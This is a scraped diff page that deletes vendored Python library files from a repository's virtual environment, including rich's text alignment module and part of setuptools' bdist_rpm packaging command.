67 |
-
return False
|
68 |
-
|
69 |
-
is_dir = is_file
|
70 |
-
|
71 |
-
def joinpath(self, other):
|
72 |
-
if not self._reader:
|
73 |
-
return CompatibilityFiles.OrphanPath(other)
|
74 |
-
return CompatibilityFiles.ChildPath(self._reader, other)
|
75 |
-
|
76 |
-
@property
|
77 |
-
def name(self):
|
78 |
-
return self._spec.name
|
79 |
-
|
80 |
-
def open(self, mode='r', *args, **kwargs):
|
81 |
-
return _io_wrapper(self._reader.open_resource(None), mode, *args, **kwargs)
|
82 |
-
|
83 |
-
class ChildPath(abc.Traversable):
|
84 |
-
"""
|
85 |
-
Path tied to a resource reader child.
|
86 |
-
Can be read but doesn't expose any meaningful children.
|
87 |
-
"""
|
88 |
-
|
89 |
-
def __init__(self, reader, name):
|
90 |
-
self._reader = reader
|
91 |
-
self._name = name
|
92 |
-
|
93 |
-
def iterdir(self):
|
94 |
-
return iter(())
|
95 |
-
|
96 |
-
def is_file(self):
|
97 |
-
return self._reader.is_resource(self.name)
|
98 |
-
|
99 |
-
def is_dir(self):
|
100 |
-
return not self.is_file()
|
101 |
-
|
102 |
-
def joinpath(self, other):
|
103 |
-
return CompatibilityFiles.OrphanPath(self.name, other)
|
104 |
-
|
105 |
-
@property
|
106 |
-
def name(self):
|
107 |
-
return self._name
|
108 |
-
|
109 |
-
def open(self, mode='r', *args, **kwargs):
|
110 |
-
return _io_wrapper(
|
111 |
-
self._reader.open_resource(self.name), mode, *args, **kwargs
|
112 |
-
)
|
113 |
-
|
114 |
-
class OrphanPath(abc.Traversable):
|
115 |
-
"""
|
116 |
-
Orphan path, not tied to a module spec or resource reader.
|
117 |
-
Can't be read and doesn't expose any meaningful children.
|
118 |
-
"""
|
119 |
-
|
120 |
-
def __init__(self, *path_parts):
|
121 |
-
if len(path_parts) < 1:
|
122 |
-
raise ValueError('Need at least one path part to construct a path')
|
123 |
-
self._path = path_parts
|
124 |
-
|
125 |
-
def iterdir(self):
|
126 |
-
return iter(())
|
127 |
-
|
128 |
-
def is_file(self):
|
129 |
-
return False
|
130 |
-
|
131 |
-
is_dir = is_file
|
132 |
-
|
133 |
-
def joinpath(self, other):
|
134 |
-
return CompatibilityFiles.OrphanPath(*self._path, other)
|
135 |
-
|
136 |
-
@property
|
137 |
-
def name(self):
|
138 |
-
return self._path[-1]
|
139 |
-
|
140 |
-
def open(self, mode='r', *args, **kwargs):
|
141 |
-
raise FileNotFoundError("Can't open orphan path")
|
142 |
-
|
143 |
-
def __init__(self, spec):
|
144 |
-
self.spec = spec
|
145 |
-
|
146 |
-
@property
|
147 |
-
def _reader(self):
|
148 |
-
with suppress(AttributeError):
|
149 |
-
return self.spec.loader.get_resource_reader(self.spec.name)
|
150 |
-
|
151 |
-
def _native(self):
|
152 |
-
"""
|
153 |
-
Return the native reader if it supports files().
|
154 |
-
"""
|
155 |
-
reader = self._reader
|
156 |
-
return reader if hasattr(reader, 'files') else self
|
157 |
-
|
158 |
-
def __getattr__(self, attr):
|
159 |
-
return getattr(self._reader, attr)
|
160 |
-
|
161 |
-
def files(self):
|
162 |
-
return CompatibilityFiles.SpecPath(self.spec, self._reader)
|
163 |
-
|
164 |
-
|
165 |
-
def wrap_spec(package):
|
166 |
-
"""
|
167 |
-
Construct a package spec with traversable compatibility
|
168 |
-
on the spec/loader/reader.
|
169 |
-
"""
|
170 |
-
return SpecLoaderAdapter(package.__spec__, TraversableResourcesLoader)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/chardet/metadata/__init__.py
DELETED
File without changes
|
spaces/Big-Web/MMSD/env/Lib/site-packages/pip/_vendor/rich/align.py
DELETED
@@ -1,311 +0,0 @@
|
|
1 |
-
import sys
|
2 |
-
from itertools import chain
|
3 |
-
from typing import TYPE_CHECKING, Iterable, Optional
|
4 |
-
|
5 |
-
if sys.version_info >= (3, 8):
|
6 |
-
from typing import Literal
|
7 |
-
else:
|
8 |
-
from pip._vendor.typing_extensions import Literal # pragma: no cover
|
9 |
-
|
10 |
-
from .constrain import Constrain
|
11 |
-
from .jupyter import JupyterMixin
|
12 |
-
from .measure import Measurement
|
13 |
-
from .segment import Segment
|
14 |
-
from .style import StyleType
|
15 |
-
|
16 |
-
if TYPE_CHECKING:
|
17 |
-
from .console import Console, ConsoleOptions, RenderableType, RenderResult
|
18 |
-
|
19 |
-
AlignMethod = Literal["left", "center", "right"]
|
20 |
-
VerticalAlignMethod = Literal["top", "middle", "bottom"]
|
21 |
-
|
22 |
-
|
23 |
-
class Align(JupyterMixin):
|
24 |
-
"""Align a renderable by adding spaces if necessary.
|
25 |
-
|
26 |
-
Args:
|
27 |
-
renderable (RenderableType): A console renderable.
|
28 |
-
align (AlignMethod): One of "left", "center", or "right""
|
29 |
-
style (StyleType, optional): An optional style to apply to the background.
|
30 |
-
vertical (Optional[VerticalAlginMethod], optional): Optional vertical align, one of "top", "middle", or "bottom". Defaults to None.
|
31 |
-
pad (bool, optional): Pad the right with spaces. Defaults to True.
|
32 |
-
width (int, optional): Restrict contents to given width, or None to use default width. Defaults to None.
|
33 |
-
height (int, optional): Set height of align renderable, or None to fit to contents. Defaults to None.
|
34 |
-
|
35 |
-
Raises:
|
36 |
-
ValueError: if ``align`` is not one of the expected values.
|
37 |
-
"""
|
38 |
-
|
39 |
-
def __init__(
|
40 |
-
self,
|
41 |
-
renderable: "RenderableType",
|
42 |
-
align: AlignMethod = "left",
|
43 |
-
style: Optional[StyleType] = None,
|
44 |
-
*,
|
45 |
-
vertical: Optional[VerticalAlignMethod] = None,
|
46 |
-
pad: bool = True,
|
47 |
-
width: Optional[int] = None,
|
48 |
-
height: Optional[int] = None,
|
49 |
-
) -> None:
|
50 |
-
if align not in ("left", "center", "right"):
|
51 |
-
raise ValueError(
|
52 |
-
f'invalid value for align, expected "left", "center", or "right" (not {align!r})'
|
53 |
-
)
|
54 |
-
if vertical is not None and vertical not in ("top", "middle", "bottom"):
|
55 |
-
raise ValueError(
|
56 |
-
f'invalid value for vertical, expected "top", "middle", or "bottom" (not {vertical!r})'
|
57 |
-
)
|
58 |
-
self.renderable = renderable
|
59 |
-
self.align = align
|
60 |
-
self.style = style
|
61 |
-
self.vertical = vertical
|
62 |
-
self.pad = pad
|
63 |
-
self.width = width
|
64 |
-
self.height = height
|
65 |
-
|
66 |
-
def __repr__(self) -> str:
|
67 |
-
return f"Align({self.renderable!r}, {self.align!r})"
|
68 |
-
|
69 |
-
@classmethod
|
70 |
-
def left(
|
71 |
-
cls,
|
72 |
-
renderable: "RenderableType",
|
73 |
-
style: Optional[StyleType] = None,
|
74 |
-
*,
|
75 |
-
vertical: Optional[VerticalAlignMethod] = None,
|
76 |
-
pad: bool = True,
|
77 |
-
width: Optional[int] = None,
|
78 |
-
height: Optional[int] = None,
|
79 |
-
) -> "Align":
|
80 |
-
"""Align a renderable to the left."""
|
81 |
-
return cls(
|
82 |
-
renderable,
|
83 |
-
"left",
|
84 |
-
style=style,
|
85 |
-
vertical=vertical,
|
86 |
-
pad=pad,
|
87 |
-
width=width,
|
88 |
-
height=height,
|
89 |
-
)
|
90 |
-
|
91 |
-
@classmethod
|
92 |
-
def center(
|
93 |
-
cls,
|
94 |
-
renderable: "RenderableType",
|
95 |
-
style: Optional[StyleType] = None,
|
96 |
-
*,
|
97 |
-
vertical: Optional[VerticalAlignMethod] = None,
|
98 |
-
pad: bool = True,
|
99 |
-
width: Optional[int] = None,
|
100 |
-
height: Optional[int] = None,
|
101 |
-
) -> "Align":
|
102 |
-
"""Align a renderable to the center."""
|
103 |
-
return cls(
|
104 |
-
renderable,
|
105 |
-
"center",
|
106 |
-
style=style,
|
107 |
-
vertical=vertical,
|
108 |
-
pad=pad,
|
109 |
-
width=width,
|
110 |
-
height=height,
|
111 |
-
)
|
112 |
-
|
113 |
-
@classmethod
|
114 |
-
def right(
|
115 |
-
cls,
|
116 |
-
renderable: "RenderableType",
|
117 |
-
style: Optional[StyleType] = None,
|
118 |
-
*,
|
119 |
-
vertical: Optional[VerticalAlignMethod] = None,
|
120 |
-
pad: bool = True,
|
121 |
-
width: Optional[int] = None,
|
122 |
-
height: Optional[int] = None,
|
123 |
-
) -> "Align":
|
124 |
-
"""Align a renderable to the right."""
|
125 |
-
return cls(
|
126 |
-
renderable,
|
127 |
-
"right",
|
128 |
-
style=style,
|
129 |
-
vertical=vertical,
|
130 |
-
pad=pad,
|
131 |
-
width=width,
|
132 |
-
height=height,
|
133 |
-
)
|
134 |
-
|
135 |
-
def __rich_console__(
|
136 |
-
self, console: "Console", options: "ConsoleOptions"
|
137 |
-
) -> "RenderResult":
|
138 |
-
align = self.align
|
139 |
-
width = console.measure(self.renderable, options=options).maximum
|
140 |
-
rendered = console.render(
|
141 |
-
Constrain(
|
142 |
-
self.renderable, width if self.width is None else min(width, self.width)
|
143 |
-
),
|
144 |
-
options.update(height=None),
|
145 |
-
)
|
146 |
-
lines = list(Segment.split_lines(rendered))
|
147 |
-
width, height = Segment.get_shape(lines)
|
148 |
-
lines = Segment.set_shape(lines, width, height)
|
149 |
-
new_line = Segment.line()
|
150 |
-
excess_space = options.max_width - width
|
151 |
-
style = console.get_style(self.style) if self.style is not None else None
|
152 |
-
|
153 |
-
def generate_segments() -> Iterable[Segment]:
|
154 |
-
if excess_space <= 0:
|
155 |
-
# Exact fit
|
156 |
-
for line in lines:
|
157 |
-
yield from line
|
158 |
-
yield new_line
|
159 |
-
|
160 |
-
elif align == "left":
|
161 |
-
# Pad on the right
|
162 |
-
pad = Segment(" " * excess_space, style) if self.pad else None
|
163 |
-
for line in lines:
|
164 |
-
yield from line
|
165 |
-
if pad:
|
166 |
-
yield pad
|
167 |
-
yield new_line
|
168 |
-
|
169 |
-
elif align == "center":
|
170 |
-
# Pad left and right
|
171 |
-
left = excess_space // 2
|
172 |
-
pad = Segment(" " * left, style)
|
173 |
-
pad_right = (
|
174 |
-
Segment(" " * (excess_space - left), style) if self.pad else None
|
175 |
-
)
|
176 |
-
for line in lines:
|
177 |
-
if left:
|
178 |
-
yield pad
|
179 |
-
yield from line
|
180 |
-
if pad_right:
|
181 |
-
yield pad_right
|
182 |
-
yield new_line
|
183 |
-
|
184 |
-
elif align == "right":
|
185 |
-
# Padding on left
|
186 |
-
pad = Segment(" " * excess_space, style)
|
187 |
-
for line in lines:
|
188 |
-
yield pad
|
189 |
-
yield from line
|
190 |
-
yield new_line
|
191 |
-
|
192 |
-
blank_line = (
|
193 |
-
Segment(f"{' ' * (self.width or options.max_width)}\n", style)
|
194 |
-
if self.pad
|
195 |
-
else Segment("\n")
|
196 |
-
)
|
197 |
-
|
198 |
-
def blank_lines(count: int) -> Iterable[Segment]:
|
199 |
-
if count > 0:
|
200 |
-
for _ in range(count):
|
201 |
-
yield blank_line
|
202 |
-
|
203 |
-
vertical_height = self.height or options.height
|
204 |
-
iter_segments: Iterable[Segment]
|
205 |
-
if self.vertical and vertical_height is not None:
|
206 |
-
if self.vertical == "top":
|
207 |
-
bottom_space = vertical_height - height
|
208 |
-
iter_segments = chain(generate_segments(), blank_lines(bottom_space))
|
209 |
-
elif self.vertical == "middle":
|
210 |
-
top_space = (vertical_height - height) // 2
|
211 |
-
bottom_space = vertical_height - top_space - height
|
212 |
-
iter_segments = chain(
|
213 |
-
blank_lines(top_space),
|
214 |
-
generate_segments(),
|
215 |
-
blank_lines(bottom_space),
|
216 |
-
)
|
217 |
-
else: # self.vertical == "bottom":
|
218 |
-
top_space = vertical_height - height
|
219 |
-
iter_segments = chain(blank_lines(top_space), generate_segments())
|
220 |
-
else:
|
221 |
-
iter_segments = generate_segments()
|
222 |
-
if self.style:
|
223 |
-
style = console.get_style(self.style)
|
224 |
-
iter_segments = Segment.apply_style(iter_segments, style)
|
225 |
-
yield from iter_segments
|
226 |
-
|
227 |
-
def __rich_measure__(
|
228 |
-
self, console: "Console", options: "ConsoleOptions"
|
229 |
-
) -> Measurement:
|
230 |
-
measurement = Measurement.get(console, options, self.renderable)
|
231 |
-
return measurement
|
232 |
-
|
233 |
-
|
234 |
-
class VerticalCenter(JupyterMixin):
|
235 |
-
"""Vertically aligns a renderable.
|
236 |
-
|
237 |
-
Warn:
|
238 |
-
This class is deprecated and may be removed in a future version. Use Align class with
|
239 |
-
`vertical="middle"`.
|
240 |
-
|
241 |
-
Args:
|
242 |
-
renderable (RenderableType): A renderable object.
|
243 |
-
"""
|
244 |
-
|
245 |
-
def __init__(
|
246 |
-
self,
|
247 |
-
renderable: "RenderableType",
|
248 |
-
style: Optional[StyleType] = None,
|
249 |
-
) -> None:
|
250 |
-
self.renderable = renderable
|
251 |
-
self.style = style
|
252 |
-
|
253 |
-
def __repr__(self) -> str:
|
254 |
-
return f"VerticalCenter({self.renderable!r})"
|
255 |
-
|
256 |
-
def __rich_console__(
|
257 |
-
self, console: "Console", options: "ConsoleOptions"
|
258 |
-
) -> "RenderResult":
|
259 |
-
style = console.get_style(self.style) if self.style is not None else None
|
260 |
-
lines = console.render_lines(
|
261 |
-
self.renderable, options.update(height=None), pad=False
|
262 |
-
)
|
263 |
-
width, _height = Segment.get_shape(lines)
|
264 |
-
new_line = Segment.line()
|
265 |
-
height = options.height or options.size.height
|
266 |
-
top_space = (height - len(lines)) // 2
|
267 |
-
bottom_space = height - top_space - len(lines)
|
268 |
-
blank_line = Segment(f"{' ' * width}", style)
|
269 |
-
|
270 |
-
def blank_lines(count: int) -> Iterable[Segment]:
|
271 |
-
for _ in range(count):
|
272 |
-
yield blank_line
|
273 |
-
yield new_line
|
274 |
-
|
275 |
-
if top_space > 0:
|
276 |
-
yield from blank_lines(top_space)
|
277 |
-
for line in lines:
|
278 |
-
yield from line
|
279 |
-
yield new_line
|
280 |
-
if bottom_space > 0:
|
281 |
-
yield from blank_lines(bottom_space)
|
282 |
-
|
283 |
-
def __rich_measure__(
|
284 |
-
self, console: "Console", options: "ConsoleOptions"
|
285 |
-
) -> Measurement:
|
286 |
-
measurement = Measurement.get(console, options, self.renderable)
|
287 |
-
return measurement
|
288 |
-
|
289 |
-
|
290 |
-
if __name__ == "__main__": # pragma: no cover
|
291 |
-
from pip._vendor.rich.console import Console, Group
|
292 |
-
from pip._vendor.rich.highlighter import ReprHighlighter
|
293 |
-
from pip._vendor.rich.panel import Panel
|
294 |
-
|
295 |
-
highlighter = ReprHighlighter()
|
296 |
-
console = Console()
|
297 |
-
|
298 |
-
panel = Panel(
|
299 |
-
Group(
|
300 |
-
Align.left(highlighter("align='left'")),
|
301 |
-
Align.center(highlighter("align='center'")),
|
302 |
-
Align.right(highlighter("align='right'")),
|
303 |
-
),
|
304 |
-
width=60,
|
305 |
-
style="on dark_blue",
|
306 |
-
title="Align",
|
307 |
-
)
|
308 |
-
|
309 |
-
console.print(
|
310 |
-
Align.center(panel, vertical="middle", style="on red", height=console.height)
|
311 |
-
)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/Big-Web/MMSD/env/Lib/site-packages/setuptools/_distutils/command/bdist_rpm.py
DELETED
@@ -1,615 +0,0 @@
|
|
1 |
-
"""distutils.command.bdist_rpm
|
2 |
-
|
3 |
-
Implements the Distutils 'bdist_rpm' command (create RPM source and binary
|
4 |
-
distributions)."""
|
5 |
-
|
6 |
-
import subprocess
|
7 |
-
import sys
|
8 |
-
import os
|
9 |
-
|
10 |
-
from distutils.core import Command
|
11 |
-
from distutils.debug import DEBUG
|
12 |
-
from distutils.file_util import write_file
|
13 |
-
from distutils.errors import (
|
14 |
-
DistutilsOptionError,
|
15 |
-
DistutilsPlatformError,
|
16 |
-
DistutilsFileError,
|
17 |
-
DistutilsExecError,
|
18 |
-
)
|
19 |
-
from distutils.sysconfig import get_python_version
|
20 |
-
from distutils import log
|
21 |
-
|
22 |
-
|
23 |
-
class bdist_rpm(Command):
|
24 |
-
|
25 |
-
description = "create an RPM distribution"
|
26 |
-
|
27 |
-
user_options = [
|
28 |
-
('bdist-base=', None, "base directory for creating built distributions"),
|
29 |
-
(
|
30 |
-
'rpm-base=',
|
31 |
-
None,
|
32 |
-
"base directory for creating RPMs (defaults to \"rpm\" under "
|
33 |
-
"--bdist-base; must be specified for RPM 2)",
|
34 |
-
),
|
35 |
-
(
|
36 |
-
'dist-dir=',
|
37 |
-
'd',
|
38 |
-
"directory to put final RPM files in " "(and .spec files if --spec-only)",
|
39 |
-
),
|
40 |
-
(
|
41 |
-
'python=',
|
42 |
-
None,
|
43 |
-
"path to Python interpreter to hard-code in the .spec file "
|
44 |
-
"(default: \"python\")",
|
45 |
-
),
|
46 |
-
(
|
47 |
-
'fix-python',
|
48 |
-
None,
|
49 |
-
"hard-code the exact path to the current Python interpreter in "
|
50 |
-
"the .spec file",
|
51 |
-
),
|
52 |
-
('spec-only', None, "only regenerate spec file"),
|
53 |
-
('source-only', None, "only generate source RPM"),
|
54 |
-
('binary-only', None, "only generate binary RPM"),
|
55 |
-
('use-bzip2', None, "use bzip2 instead of gzip to create source distribution"),
|
56 |
-
# More meta-data: too RPM-specific to put in the setup script,
|
57 |
-
# but needs to go in the .spec file -- so we make these options
|
58 |
-
# to "bdist_rpm". The idea is that packagers would put this
|
59 |
-
# info in setup.cfg, although they are of course free to
|
60 |
-
# supply it on the command line.
|
61 |
-
(
|
62 |
-
'distribution-name=',
|
63 |
-
None,
|
64 |
-
"name of the (Linux) distribution to which this "
|
65 |
-
"RPM applies (*not* the name of the module distribution!)",
|
66 |
-
),
|
67 |
-
('group=', None, "package classification [default: \"Development/Libraries\"]"),
|
68 |
-
('release=', None, "RPM release number"),
|
69 |
-
('serial=', None, "RPM serial number"),
|
70 |
-
(
|
71 |
-
'vendor=',
|
72 |
-
None,
|
73 |
-
"RPM \"vendor\" (eg. \"Joe Blow <[email protected]>\") "
|
74 |
-
"[default: maintainer or author from setup script]",
|
75 |
-
),
|
76 |
-
(
|
77 |
-
'packager=',
|
78 |
-
None,
|
79 |
-
"RPM packager (eg. \"Jane Doe <[email protected]>\") " "[default: vendor]",
|
80 |
-
),
|
81 |
-
('doc-files=', None, "list of documentation files (space or comma-separated)"),
|
82 |
-
('changelog=', None, "RPM changelog"),
|
83 |
-
('icon=', None, "name of icon file"),
|
84 |
-
('provides=', None, "capabilities provided by this package"),
|
85 |
-
('requires=', None, "capabilities required by this package"),
|
86 |
-
('conflicts=', None, "capabilities which conflict with this package"),
|
87 |
-
('build-requires=', None, "capabilities required to build this package"),
|
88 |
-
('obsoletes=', None, "capabilities made obsolete by this package"),
|
89 |
-
('no-autoreq', None, "do not automatically calculate dependencies"),
|
90 |
-
# Actions to take when building RPM
|
91 |
-
('keep-temp', 'k', "don't clean up RPM build directory"),
|
92 |
-
('no-keep-temp', None, "clean up RPM build directory [default]"),
|
93 |
-
(
|
94 |
-
'use-rpm-opt-flags',
|
95 |
-
None,
|
96 |
-
"compile with RPM_OPT_FLAGS when building from source RPM",
|
97 |
-
),
|
98 |
-
('no-rpm-opt-flags', None, "do not pass any RPM CFLAGS to compiler"),
|
99 |
-
('rpm3-mode', None, "RPM 3 compatibility mode (default)"),
|
100 |
-
('rpm2-mode', None, "RPM 2 compatibility mode"),
|
101 |
-
# Add the hooks necessary for specifying custom scripts
|
102 |
-
('prep-script=', None, "Specify a script for the PREP phase of RPM building"),
|
103 |
-
('build-script=', None, "Specify a script for the BUILD phase of RPM building"),
|
104 |
-
(
|
105 |
-
'pre-install=',
|
106 |
-
None,
|
107 |
-
"Specify a script for the pre-INSTALL phase of RPM building",
|
108 |
-
),
|
109 |
-
(
|
110 |
-
'install-script=',
|
111 |
-
None,
|
112 |
-
"Specify a script for the INSTALL phase of RPM building",
|
113 |
-
),
|
114 |
-
(
|
115 |
-
'post-install=',
|
116 |
-
None,
|
117 |
-
"Specify a script for the post-INSTALL phase of RPM building",
|
118 |
-
),
|
119 |
-
(
|
120 |
-
'pre-uninstall=',
|
121 |
-
None,
|
122 |
-
"Specify a script for the pre-UNINSTALL phase of RPM building",
|
123 |
-
),
|
124 |
-
(
|
125 |
-
'post-uninstall=',
|
126 |
-
None,
|
127 |
-
"Specify a script for the post-UNINSTALL phase of RPM building",
|
128 |
-
),
|
129 |
-
('clean-script=', None, "Specify a script for the CLEAN phase of RPM building"),
|
130 |
-
(
|
131 |
-
'verify-script=',
|
132 |
-
None,
|
133 |
-
"Specify a script for the VERIFY phase of the RPM build",
|
134 |
-
),
|
135 |
-
# Allow a packager to explicitly force an architecture
|
136 |
-
('force-arch=', None, "Force an architecture onto the RPM build process"),
|
137 |
-
('quiet', 'q', "Run the INSTALL phase of RPM building in quiet mode"),
|
138 |
-
]
|
139 |
-
|
140 |
-
boolean_options = [
|
141 |
-
'keep-temp',
|
142 |
-
'use-rpm-opt-flags',
|
143 |
-
'rpm3-mode',
|
144 |
-
'no-autoreq',
|
145 |
-
'quiet',
|
146 |
-
]
|
147 |
-
|
148 |
-
negative_opt = {
|
149 |
-
'no-keep-temp': 'keep-temp',
|
150 |
-
'no-rpm-opt-flags': 'use-rpm-opt-flags',
|
151 |
-
'rpm2-mode': 'rpm3-mode',
|
152 |
-
}
|
153 |
-
|
154 |
-
def initialize_options(self):
|
155 |
-
self.bdist_base = None
|
156 |
-
self.rpm_base = None
|
157 |
-
self.dist_dir = None
|
158 |
-
self.python = None
|
159 |
-
self.fix_python = None
|
160 |
-
self.spec_only = None
|
161 |
-
self.binary_only = None
|
162 |
-
self.source_only = None
|
163 |
-
self.use_bzip2 = None
|
164 |
-
|
165 |
-
self.distribution_name = None
|
166 |
-
self.group = None
|
167 |
-
self.release = None
|
168 |
-
self.serial = None
|
169 |
-
self.vendor = None
|
170 |
-
self.packager = None
|
171 |
-
self.doc_files = None
|
172 |
-
self.changelog = None
|
173 |
-
self.icon = None
|
174 |
-
|
175 |
-
self.prep_script = None
|
176 |
-
self.build_script = None
|
177 |
-
self.install_script = None
|
178 |
-
self.clean_script = None
|
179 |
-
self.verify_script = None
|
180 |
-
self.pre_install = None
|
181 |
-
self.post_install = None
|
182 |
-
self.pre_uninstall = None
|
183 |
-
self.post_uninstall = None
|
184 |
-
self.prep = None
|
185 |
-
self.provides = None
|
186 |
-
self.requires = None
|
187 |
-
self.conflicts = None
|
188 |
-
self.build_requires = None
|
189 |
-
self.obsoletes = None
|
190 |
-
|
191 |
-
self.keep_temp = 0
|
192 |
-
self.use_rpm_opt_flags = 1
|
193 |
-
self.rpm3_mode = 1
|
194 |
-
self.no_autoreq = 0
|
195 |
-
|
196 |
-
self.force_arch = None
|
197 |
-
self.quiet = 0
|
198 |
-
|
199 |
-
def finalize_options(self):
|
200 |
-
self.set_undefined_options('bdist', ('bdist_base', 'bdist_base'))
|
201 |
-
if self.rpm_base is None:
|
202 |
-
if not self.rpm3_mode:
|
203 |
-
raise DistutilsOptionError("you must specify --rpm-base in RPM 2 mode")
|
204 |
-
self.rpm_base = os.path.join(self.bdist_base, "rpm")
|
205 |
-
|
206 |
-
if self.python is None:
|
207 |
-
if self.fix_python:
|
208 |
-
self.python = sys.executable
|
209 |
-
else:
|
210 |
-
self.python = "python3"
|
211 |
-
elif self.fix_python:
|
212 |
-
raise DistutilsOptionError(
|
213 |
-
"--python and --fix-python are mutually exclusive options"
|
214 |
-
)
|
215 |
-
|
216 |
-
if os.name != 'posix':
|
217 |
-
raise DistutilsPlatformError(
|
218 |
-
"don't know how to create RPM " "distributions on platform %s" % os.name
|
219 |
-
)
|
220 |
-
if self.binary_only and self.source_only:
|
221 |
-
raise DistutilsOptionError(
|
222 |
-
"cannot supply both '--source-only' and '--binary-only'"
|
223 |
-
)
|
224 |
-
|
225 |
-
# don't pass CFLAGS to pure python distributions
|
226 |
-
if not self.distribution.has_ext_modules():
|
227 |
-
self.use_rpm_opt_flags = 0
|
228 |
-
|
229 |
-
self.set_undefined_options('bdist', ('dist_dir', 'dist_dir'))
|
230 |
-
self.finalize_package_data()
|
231 |
-
|
232 |
-
def finalize_package_data(self):
|
233 |
-
self.ensure_string('group', "Development/Libraries")
|
234 |
-
self.ensure_string(
|
235 |
-
'vendor',
|
236 |
-
"%s <%s>"
|
237 |
-
% (self.distribution.get_contact(), self.distribution.get_contact_email()),
|
238 |
-
)
|
239 |
-
self.ensure_string('packager')
|
240 |
-
self.ensure_string_list('doc_files')
|
241 |
-
if isinstance(self.doc_files, list):
|
242 |
-
for readme in ('README', 'README.txt'):
|
243 |
-
if os.path.exists(readme) and readme not in self.doc_files:
|
244 |
-
self.doc_files.append(readme)
|
245 |
-
|
246 |
-
self.ensure_string('release', "1")
|
247 |
-
self.ensure_string('serial') # should it be an int?
|
248 |
-
|
249 |
-
self.ensure_string('distribution_name')
|
250 |
-
|
251 |
-
self.ensure_string('changelog')
|
252 |
-
# Format changelog correctly
|
253 |
-
self.changelog = self._format_changelog(self.changelog)
|
254 |
-
|
255 |
-
self.ensure_filename('icon')
|
256 |
-
|
257 |
-
self.ensure_filename('prep_script')
|
258 |
-
self.ensure_filename('build_script')
|
259 |
-
self.ensure_filename('install_script')
|
260 |
-
self.ensure_filename('clean_script')
|
261 |
-
self.ensure_filename('verify_script')
|
262 |
-
self.ensure_filename('pre_install')
|
263 |
-
self.ensure_filename('post_install')
|
264 |
-
self.ensure_filename('pre_uninstall')
|
265 |
-
self.ensure_filename('post_uninstall')
|
266 |
-
|
267 |
-
# XXX don't forget we punted on summaries and descriptions -- they
|
268 |
-
# should be handled here eventually!
|
269 |
-
|
270 |
-
# Now *this* is some meta-data that belongs in the setup script...
|
271 |
-
self.ensure_string_list('provides')
|
272 |
-
self.ensure_string_list('requires')
|
273 |
-
self.ensure_string_list('conflicts')
|
274 |
-
self.ensure_string_list('build_requires')
|
275 |
-
self.ensure_string_list('obsoletes')
|
276 |
-
|
277 |
-
self.ensure_string('force_arch')
|
278 |
-
|
279 |
-
def run(self): # noqa: C901
|
280 |
-
if DEBUG:
|
281 |
-
print("before _get_package_data():")
|
282 |
-
print("vendor =", self.vendor)
|
283 |
-
print("packager =", self.packager)
|
284 |
-
